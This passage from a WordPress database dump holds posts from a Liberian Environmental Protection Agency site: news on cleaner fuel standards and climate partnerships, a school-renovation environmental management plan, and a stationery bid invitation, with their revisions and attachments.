mechanisms to curb the importation and use of substandard fuels and vehicles.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop marked a pivotal step in Liberia’s transition toward a cleaner, more efficient and climate-resilient transport sector; one that advances sustainable mobility, reduces harmful emissions and contributes meaningfully to the country’s Nationally Determined Contribution (NDC) targets by 2035.</p>\n<!-- /wp:paragraph -->','Liberia Strengthens Pathway to Cleaner Transport Through Fuel Quality and Vehicle Emission Reforms','','publish','open','open','','liberia-strengthens-pathway-to-cleaner-transport-through-fuel-quality-and-vehicle-emission-reforms','','','2026-06-09 17:31:52','2026-06-09 17:31:52','',0,'https://ekmsliberia.info/?p=5945',7,'post','',0),(5946,38,'2026-06-09 17:30:57','2026-06-09 17:30:57','','719160126_1505325871636667_850325227837403501_n','','inherit','open','closed','','719160126_1505325871636667_850325227837403501_n','','','2026-06-09 17:30:57','2026-06-09 17:30:57','',5945,'https://ekmsliberia.info/wp-content/uploads/2026/06/719160126_1505325871636667_850325227837403501_n.jpg',0,'attachment','image/jpeg',0),(5947,38,'2026-06-09 17:31:47','2026-06-09 17:31:47','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency (EPA) of Liberia has reaffirmed its commitment to transforming the country’s transport sector through the implementation and enforcement of cleaner fuel and vehicle emission standards aimed at improving air quality, protecting public health,</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>and supporting national climate ambitions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Addressing participants at the National Dissemination Workshop on Promoting Cleaner Fuels and Vehicle Strategies in Liberia at the Royal Ambassador Hotel in Margibi County, the Deputy Executive Director for Administration, Hon. Anthony S. Kollie, underscored the growing environmental and health concerns associated with aging vehicles and poor fuel quality. He noted that the rapid expansion of Liberia’s vehicle fleet, coupled with the continued importation of high-emitting vehicles and fuels, presents significant challenges to the country’s sustainable development and climate objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Supported by the Climate and Clean Air Coalition (CCAC) and implemented with technical assistance from the United Nations Environment Programme (UNEP), the initiative has produced a comprehensive assessment of Liberia’s fuel quality and vehicle efficiency landscape. The assessment provides critical evidence and strategic recommendations to guide policy reforms, strengthen regulatory frameworks, enhance compliance monitoring and support the adoption of cleaner transport solutions nationwide.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Hon. Kollie emphasized that the EPA will work closely with key government institutions, private sector actors, transport unions, civil society organizations and development partners to ensure that the findings are translated into practical and enforceable measures. These efforts will include public awareness campaigns, institutional capacity strengthening, stakeholder engagement, and robust enforcement mechanisms to curb the importation and use of substandard fuels and vehicles.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop marked a pivotal step in Liberia’s transition toward a cleaner, more efficient and climate-resilient transport sector; one that advances sustainable mobility, reduces harmful emissions and contributes meaningfully to the country’s Nationally Determined Contribution (NDC) targets by 2035.</p>\n<!-- /wp:paragraph -->','Liberia Strengthens Pathway to Cleaner Transport Through Fuel Quality and Vehicle Emission Reforms','','inherit','closed','closed','','5945-revision-v1','','','2026-06-09 17:31:47','2026-06-09 17:31:47','',5945,'https://ekmsliberia.info/?p=5947',0,'revision','',0),(5948,38,'2026-06-09 17:33:06','2026-06-09 17:33:06','','718014503_1505325968303324_8087690081882678858_n','','inherit','open','closed','','718014503_1505325968303324_8087690081882678858_n','','','2026-06-09 17:33:06','2026-06-09 17:33:06','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/718014503_1505325968303324_8087690081882678858_n.jpg',0,'attachment','image/jpeg',0),(5949,38,'2026-06-15 09:53:09','0000-00-00 00:00:00','','Auto Draft','','auto-draft','open','open','','','','','2026-06-15 09:53:09','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?p=5949',0,'post','',0),(5950,38,'2026-06-15 11:08:46','2026-06-15 11:08:46','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>EXECUTIVE SUMMARY</strong>\r\n\r\nES.1 Project Identification\r\n\r\nThis Environmental and Social Management Plan (ESMP) has been prepared by Royal Environmental Group (RE-Group) in respect of the renovation of N. V. Massaquoi School in West Point Township, District Seven, Montserrado County, into the West Point Environmental Innovation Center (EIC). The sub-project falls under Output 3 of the Monrovia Metropolitan Climate Resilience Project (MMCRP), a Green Climate Fund (GCF)–financed initiative implemented by the United Nations Development Programme (UNDP) with the Environmental Protection Agency (EPA) of Liberia serving as the Executing Entity. The building is owned by the Government of Liberia and is operated as a public school under the Monrovia Consolidated School System (MCSS). The works contractor is Monroe International Group of Companies, with construction presently ongoing.\r\n\r\n<strong>ES.2 Project Description Summary</strong>\r\n\r\nThe works comprise the rehabilitation and adaptive reuse of an existing two-story concrete-frame school building to function as an Environmental Innovation Center. The renovation includes the refurbishment of classrooms, the installation of new training and demonstration spaces, the upgrading of sanitary facilities, electrical re-wiring, the provision of climate-resilient drainage and the establishment of a construction camp on the site itself. The daily workforce ranges between seventeen and twenty workers. The school is out of session for the duration of the works. The EIC, once operational, will serve as a community hub for climate-resilient livelihoods training, mangrove and coastal awareness education, and gender-responsive vocational programmes consistent with MMCRP Output 3.\r\n\r\n</div>\r\n</div>\r\n</div>','ENVIRONMENTAL AND SOCIAL MANAGEMENT PLAN (ESMP) FOR THE RENOVATION OF N. V. MASSAQUOI SCHOOL INTO THE WEST POINT ENVIRONMENTAL INNOVATION CENTER (EIC)','','private','closed','closed','','environmental-and-social-management-plan-esmp-for-the-renovation-of-n-v-massaquoi-school-into-the-west-point-environmental-innovation-center-eic','','','2026-06-16 12:12:55','2026-06-16 12:12:55','',0,'https://ekmsliberia.info/?post_type=document&#038;p=5950',1,'document','',0),(5951,38,'2026-06-15 11:00:44','2026-06-15 11:00:44','','ESMP_EIC_West_Point_MMCRP_Updated','','inherit','open','closed','','esmp_eic_west_point_mmcrp_updated','','','2026-06-15 11:00:44','2026-06-15 11:00:44','',5950,'https://ekmsliberia.info/wp-content/uploads/2026/06/ESMP_EIC_West_Point_MMCRP_Updated.pdf',0,'attachment','application/pdf',0),(5952,38,'2026-06-15 11:05:50','2026-06-15 11:05:50','<div class=\"page\" title=\"Page 5\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>EXECUTIVE SUMMARY</strong>\r\n\r\nES.1 Project Identification\r\n\r\nThis Environmental and Social Management Plan (ESMP) has been prepared by Royal Environmental Group (RE-Group) in respect of the renovation of N. V. Massaquoi School in West Point Township, District Seven, Montserrado County, into the West Point Environmental Innovation Center (EIC). The sub-project falls under Output 3 of the Monrovia Metropolitan Climate Resilience Project (MMCRP), a Green Climate Fund (GCF)–financed initiative implemented by the United Nations Development Programme (UNDP) with the Environmental Protection Agency (EPA) of Liberia serving as the Executing Entity. The building is owned by the Government of Liberia and is operated as a public school under the Monrovia Consolidated School System (MCSS). The works contractor is Monroe International Group of Companies, with construction presently ongoing.\r\n\r\n<strong>ES.2 Project Description Summary</strong>\r\n\r\nThe works comprise the rehabilitation and adaptive reuse of an existing two-story concrete-frame school building to function as an Environmental Innovation Center. The renovation includes the refurbishment of classrooms, the installation of new training and demonstration spaces, the upgrading of sanitary facilities, electrical re-wiring, the provision of climate-resilient drainage and the establishment of a construction camp on the site itself. The daily workforce ranges between seventeen and twenty workers. The school is out of session for the duration of the works. The EIC, once operational, will serve as a community hub for climate-resilient livelihoods training, mangrove and coastal awareness education, and gender-responsive vocational programmes consistent with MMCRP Output 3.\r\n\r\n</div>\r\n</div>\r\n</div>','ENVIRONMENTAL AND SOCIAL MANAGEMENT PLAN (ESMP) FOR THE RENOVATION OF N. V. MASSAQUOI SCHOOL INTO THE WEST POINT ENVIRONMENTAL INNOVATION CENTER (EIC)','','inherit','closed','closed','','5950-revision-v1','','','2026-06-15 11:05:50','2026-06-15 11:05:50','',5950,'https://ekmsliberia.info/?p=5952',0,'revision','',0),(5953,38,'2026-06-15 11:08:23','2026-06-15 11:08:23','','Screenshot 2026-06-15 at 10.48.53','','inherit','open','closed','','screenshot-2026-06-15-at-10-48-53','','','2026-06-15 11:08:23','2026-06-15 11:08:23','',5950,'https://ekmsliberia.info/wp-content/uploads/2026/06/Screenshot-2026-06-15-at-10.48.53.png',0,'attachment','image/png',0),(5954,38,'2026-06-16 11:43:18','2026-06-16 11:43:18','<strong>INVITATION FOR BIDS</strong>\r\n\r\n<strong>Section I.</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>                   (PROCUREMENT OF SUPPLY OF FURNITURE &amp; FIXTURE)</strong>\r\n\r\n<sup> </sup>\r\n\r\n&nbsp;\r\n\r\n<strong>Contract Identification No</strong>.:<strong> IFB NO.BPS/EPA/CISRB/004/26</strong>\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>The Government of the Republic of Liberia through the <strong>Environmental Protection Agency (EPA)</strong> has received Funds from African Development Bank (AfDB) for the implementation of the <strong>ENHANCING CLIMATE INFORMATION SYSYTEM FOR</strong> <strong>RESILIENCE DEVELOPMENT</strong> <strong>PROJECT</strong> and intends to apply part of the funds towards the procurement of <strong>SUPPLY OF STATIONERIES.</strong></li>\r\n</ol>\r\n&nbsp;\r\n<ol>\r\n 	<li>The Environmental Protection Agency now invites sealed bids from eligible registered bidders for THE SUPPLY OF STATIONERIES.</li>\r\n 	<li>Bidding will be conducted through the <strong>Restricted Bidding process </strong>as specified in the Public Procurement &amp; Concessions Commission Act (PPCA) of 2010.</li>\r\n 	<li><u>Specification &amp; Quantity</u></li>\r\n</ol>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Draft-CIS_Stationeries_SBD_Version_01-1-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','BIDDING DOCUMENTS NCB  THE SUPPLY OF STATIONERIES     IFB NO.BPS/EPA/CISRB/004/26','','publish','closed','closed','','bidding-documents-ncb-the-supply-of-stationeries-ifb-no-bps-epa-cisrb-004-26','','','2026-06-16 11:43:18','2026-06-16 11:43:18','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5954',4,'ekms_bulletin','',0),(5955,38,'2026-06-16 11:36:13','2026-06-16 11:36:13','<strong>INVITATION FOR BIDS</strong>\r\n\r\n<strong>Section I.</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>                   (PROCUREMENT OF SUPPLY OF FURNITURE &amp; FIXTURE)</strong>\r\n\r\n<sup> </sup>\r\n\r\n&nbsp;\r\n\r\n<strong>Contract Identification No</strong>.:<strong> IFB NO.BPS/EPA/CISRB/004/26</strong>\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>The Government of the Republic of Liberia through the <strong>Environmental Protection Agency (EPA)</strong> has received Funds from African Development Bank (AfDB) for the implementation of the <strong>ENHANCING CLIMATE INFORMATION SYSYTEM FOR</strong> <strong>RESILIENCE DEVELOPMENT</strong> <strong>PROJECT</strong> and intends to apply part of the funds towards the procurement of <strong>SUPPLY OF STATIONERIES.</strong></li>\r\n</ol>\r\n&nbsp;\r\n<ol>\r\n 	<li>The Environmental Protection Agency now invites sealed bids from eligible registered bidders for THE SUPPLY OF STATIONERIES.</li>\r\n 	<li>Bidding will be conducted through the <strong>Restricted Bidding process </strong>as specified in the Public Procurement &amp; Concessions Commission Act (PPCA) of 2010.</li>\r\n 	<li><u>Specification &amp; Quantity</u></li>\r\n</ol>','BIDDING DOCUMENTS NCB  THE SUPPLY OF STATIONERIES     IFB NO.BPS/EPA/CISRB/004/26','','inherit','closed','closed','','5954-revision-v1','','','2026-06-16 11:36:13','2026-06-16 11:36:13','',5954,'https://ekmsliberia.info/?p=5955',0,'revision','',0),(5956,38,'2026-06-16 11:39:16','2026-06-16 11:39:16','','Draft CIS_Stationeries_SBD_Version_01 (1) (1)','','inherit','open','closed','','draft-cis_stationeries_sbd_version_01-1-1','','','2026-06-16 11:39:16','2026-06-16 11:39:16','',0,'https://ekmsliberia.info/wp-content/uploads/2026/06/Draft-CIS_Stationeries_SBD_Version_01-1-1.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5957,38,'2026-06-16 11:43:18','2026-06-16 11:43:18','<strong>INVITATION FOR BIDS</strong>\r\n\r\n<strong>Section I.</strong>\r\n\r\n&nbsp;\r\n\r\n<strong>                   (PROCUREMENT OF SUPPLY OF FURNITURE &amp; FIXTURE)</strong>\r\n\r\n<sup> </sup>\r\n\r\n&nbsp;\r\n\r\n<strong>Contract Identification No</strong>.:<strong> IFB NO.BPS/EPA/CISRB/004/26</strong>\r\n\r\n&nbsp;\r\n<ol>\r\n 	<li>The Government of the Republic of Liberia through the <strong>Environmental Protection Agency (EPA)</strong> has received Funds from African Development Bank (AfDB) for the implementation of the <strong>ENHANCING CLIMATE INFORMATION SYSYTEM FOR</strong> <strong>RESILIENCE DEVELOPMENT</strong> <strong>PROJECT</strong> and intends to apply part of the funds towards the procurement of <strong>SUPPLY OF STATIONERIES.</strong></li>\r\n</ol>\r\n&nbsp;\r\n<ol>\r\n 	<li>The Environmental Protection Agency now invites sealed bids from eligible registered bidders for THE SUPPLY OF STATIONERIES.</li>\r\n 	<li>Bidding will be conducted through the <strong>Restricted Bidding process </strong>as specified in the Public Procurement &amp; Concessions Commission Act (PPCA) of 2010.</li>\r\n 	<li><u>Specification &amp; Quantity</u></li>\r\n</ol>\r\nClick to:<a href=\"https://ekmsliberia.info/wp-content/uploads/2026/06/Draft-CIS_Stationeries_SBD_Version_01-1-1.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','BIDDING DOCUMENTS NCB  THE SUPPLY OF STATIONERIES     IFB NO.BPS/EPA/CISRB/004/26','','inherit','closed','closed','','5954-revision-v1','','','2026-06-16 11:43:18','2026-06-16 11:43:18','',5954,'https://ekmsliberia.info/?p=5957',0,'revision','',0),(5958,38,'2026-06-16 12:38:42','0000-00-00 00:00:00','','Auto Draft','','auto-draft','closed','closed','','','','','2026-06-16 12:38:42','0000-00-00 00:00:00','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&p=5958',0,'ekms_bulletin','',0),(5959,38,'2026-06-16 21:24:59','0000-00-00 00:00:00','<!-- wp:paragraph -->\n<p>[16/06/2026, 20:39:28] ~ JournalistJeremiah Mulbah: VIENNA, AUSTRIA, June 15, 2026– As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.<br>[16/06/2026, 20:40:15] ~ JournalistJeremiah Mulbah: International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BONN, Germany, June 16, 2026 – Liberia\'s efforts to advance a sustainable and climate-resilient future gained significant international attention at SB64 as the Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, engaged in productive discussions with senior leaders of the UNFCCC\'s Sharm el-Sheikh Mitigation Ambition and Implementation Work Programme (MWP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The bilateral meeting with MWP Co-Chairs Angela Naneu Churie Kallhauge and Gao Xiang centered on opportunities to secure financial and institutional support for Liberia\'s Clean Smart Project, an ambitious initiative aimed at expanding renewable energy access and accelerating the country\'s transition toward a low-carbon economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions highlighted Liberia\'s growing profile within international climate circles and the country\'s commitment to implementing practical solutions that address energy poverty, create economic opportunities, and contribute to global emissions reduction efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the meeting Tuesday, Dr. Yarkpawolo emphasized that Liberia remains committed to building partnerships that can unlock investment, innovation, and sustainable development opportunities for its people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the Clean Smart Project aligns with Liberia\'s broader vision of creating a cleaner, more productive, and resilient economy while contributing to international efforts to combat climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Kallhauge praised Liberia\'s vision and commitment to climate action, describing the Clean Smart Project as a promising initiative with the potential to deliver meaningful environmental and developmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed strong interest in supporting the project\'s advancement and pledged to help facilitate introductions to potential funding partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notable show of confidence in Liberia\'s climate agenda, Ms. Kallhauge also expressed interest in visiting Liberia to engage directly with national stakeholders and explore opportunities for future collaboration.</p>\n<!-- /wp:paragraph -->','EPA Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','','draft','open','open','','','','','2026-06-16 21:24:59','2026-06-16 21:24:59','',0,'https://ekmsliberia.info/?p=5959',6,'post','',0),(5960,38,'2026-06-16 21:24:57','2026-06-16 21:24:57','<!-- wp:paragraph -->\n<p>[16/06/2026, 20:39:28] ~ JournalistJeremiah Mulbah: VIENNA, AUSTRIA, June 15, 2026– As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.<br>[16/06/2026, 20:40:15] ~ JournalistJeremiah Mulbah: International Interest Grows in Liberia\'s Clean Smart Project Following High-Level SB64 Engagement</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>BONN, Germany, June 16, 2026 – Liberia\'s efforts to advance a sustainable and climate-resilient future gained significant international attention at SB64 as the Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel Urey Yarkpawolo, engaged in productive discussions with senior leaders of the UNFCCC\'s Sharm el-Sheikh Mitigation Ambition and Implementation Work Programme (MWP).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The bilateral meeting with MWP Co-Chairs Angela Naneu Churie Kallhauge and Gao Xiang centered on opportunities to secure financial and institutional support for Liberia\'s Clean Smart Project, an ambitious initiative aimed at expanding renewable energy access and accelerating the country\'s transition toward a low-carbon economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions highlighted Liberia\'s growing profile within international climate circles and the country\'s commitment to implementing practical solutions that address energy poverty, create economic opportunities, and contribute to global emissions reduction efforts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the meeting Tuesday, Dr. Yarkpawolo emphasized that Liberia remains committed to building partnerships that can unlock investment, innovation, and sustainable development opportunities for its people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the Clean Smart Project aligns with Liberia\'s broader vision of creating a cleaner, more productive, and resilient economy while contributing to international efforts to combat climate change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mrs. Kallhauge praised Liberia\'s vision and commitment to climate action, describing the Clean Smart Project as a promising initiative with the potential to deliver meaningful environmental and developmental impacts.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>She expressed strong interest in supporting the project\'s advancement and pledged to help facilitate introductions to potential funding partners and stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a notable show of confidence in Liberia\'s climate agenda, Ms. Kallhauge also expressed interest in visiting Liberia to engage directly with national stakeholders and explore opportunities for future collaboration.</p>\n<!-- /wp:paragraph -->','EPA Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','','inherit','closed','closed','','5959-revision-v1','','','2026-06-16 21:24:57','2026-06-16 21:24:57','',5959,'https://ekmsliberia.info/?p=5960',0,'revision','',0),(5961,38,'2026-06-16 21:43:02','2026-06-16 21:43:02','<!-- wp:paragraph -->\n<p>HELSINKI, Finland (June 10, 2026) – Liberia was among countries represented at a major international training programme focused on the future of critical energy transition minerals and environmental governance, with Arthur R.M. Becker serving as the country\'s delegate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia, participated in the 20th University of Eastern Finland–United Nations Environment Programme Course on Multilateral Environmental Agreements, which concluded in Helsinki on Tuesday, June 9, 2026.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The programme brought together 25 participants from various parts of the world to discuss emerging environmental challenges linked to the increasing demand for critical minerals needed to power the global clean energy transition.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the course, participants examined issues ranging from environmental protection and sustainable mining practices to international cooperation and the implementation of environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Becker\'s participation provided Liberia with a platform to contribute to discussions on global environmental governance while gaining insights into international best practices and policy developments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training further emphasized the importance of strengthening national institutions and enhancing cooperation among countries to ensure that the extraction and use of critical minerals support sustainable development objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the world accelerates efforts to reduce carbon emissions and expand renewable energy technologies, experts at the programme stressed the need for responsible management of mineral resources to prevent environmental degradation and promote long-term sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants at the training reaffirmed the importance of multilateral cooperation in addressing complex environmental challenges and advancing a sustainable global energy transition.</p>\n<!-- /wp:paragraph -->','Liberia Represented at Global UNEP Training on Critical Minerals and Environmental Agreements','','publish','open','open','','liberia-represented-at-global-unep-training-on-critical-minerals-and-environmental-agreements','','','2026-06-16 21:43:06','2026-06-16 21:43:06','',0,'https://ekmsliberia.info/?p=5961',5,'post','',0),(5962,38,'2026-06-16 21:27:55','2026-06-16 21:27:55','','neww1','','inherit','open','closed','','neww1','','','2026-06-16 21:27:55','2026-06-16 21:27:55','',5961,'https://ekmsliberia.info/wp-content/uploads/2026/06/neww1.jpeg',0,'attachment','image/jpeg',0),(5963,38,'2026-06-16 21:43:02','2026-06-16 21:43:02','<!-- wp:paragraph -->\n<p>HELSINKI, Finland (June 10, 2026) – Liberia was among countries represented at a major international training programme focused on the future of critical energy transition minerals and environmental governance, with Arthur R.M. Becker serving as the country\'s delegate.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Becker, Director of the Department of Multilateral Environmental Agreements at the Environmental Protection Agency of Liberia, participated in the 20th University of Eastern Finland–United Nations Environment Programme Course on Multilateral Environmental Agreements, which concluded in Helsinki on Tuesday, June 9, 2026.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The programme brought together 25 participants from various parts of the world to discuss emerging environmental challenges linked to the increasing demand for critical minerals needed to power the global clean energy transition.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>During the course, participants examined issues ranging from environmental protection and sustainable mining practices to international cooperation and the implementation of environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Becker\'s participation provided Liberia with a platform to contribute to discussions on global environmental governance while gaining insights into international best practices and policy developments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The training further emphasized the importance of strengthening national institutions and enhancing cooperation among countries to ensure that the extraction and use of critical minerals support sustainable development objectives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the world accelerates efforts to reduce carbon emissions and expand renewable energy technologies, experts at the programme stressed the need for responsible management of mineral resources to prevent environmental degradation and promote long-term sustainability.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Participants at the training reaffirmed the importance of multilateral cooperation in addressing complex environmental challenges and advancing a sustainable global energy transition.</p>\n<!-- /wp:paragraph -->','Liberia Represented at Global UNEP Training on Critical Minerals and Environmental Agreements','','inherit','closed','closed','','5961-revision-v1','','','2026-06-16 21:43:02','2026-06-16 21:43:02','',5961,'https://ekmsliberia.info/?p=5963',0,'revision','',0),(5964,38,'2026-06-16 21:55:22','2026-06-16 21:55:22','<!-- wp:paragraph -->\n<p>VIENNA, AUSTRIA, June 15, 2026– As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The discussions are expected to pave the way for stronger partnerships, increased technical support, and greater opportunities for financing environmental and climate-related initiatives in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At a time when developing nations face growing climate pressures, Liberia is actively seeking partnerships that can help strengthen national capacity, promote green development, and support the country\'s commitments under international environmental agreements.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The opening day of talks was described as highly productive, with both sides reaffirming their shared commitment to advancing climate action and sustainable development. The engagement also provides an opportunity for Liberian officials to exchange experiences, identify best practices, and explore innovative solutions that can support the country\'s environmental agenda.</p>\n<!-- /wp:paragraph -->','Liberia Strengthens Global Climate Partnerships Through Vienna Talks with UNIDO','','publish','open','open','','liberia-strengthens-global-climate-partnerships-through-vienna-talks-with-unido','','','2026-06-16 21:55:27','2026-06-16 21:55:27','',0,'https://ekmsliberia.info/?p=5964',4,'post','',0),(5965,38,'2026-06-16 21:53:08','2026-06-16 21:53:08','','to news','','inherit','open','closed','','to-news','','','2026-06-16 21:53:08','2026-06-16 21:53:08','',5964,'https://ekmsliberia.info/wp-content/uploads/2026/06/to-news.jpg',0,'attachment','image/jpeg',0),(5966,38,'2026-06-16 21:55:22','2026-06-16 21:55:22','<!-- wp:paragraph -->\n<p>VIENNA, AUSTRIA, June 15, 2026– As Liberia continues to position itself at the forefront of climate action and sustainable development efforts, three senior officials from the Environmental Protection Agency (EPA) of Liberia are participating in a strategic three-day engagement with the United Nations Industrial Development Organization (UNIDO) in Vienna, Austria.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Held at the renowned Vienna International Centre, the meeting marks an important step in deepening cooperation between Liberia and UNIDO on issues ranging from climate resilience and environmental governance to sustainable industrial development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Leading the EPA delegation are Arthur R.M. Becker, Director of Multilateral Environmental Agreements (MEAs); Z. Elijah Whapoe, Coordinator of the National Climate Change Secretariat; and Desmond T. Thompson, Alternative Global Environment Facility (GEF) Operational Focal Point and Project Liaison Officer.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph 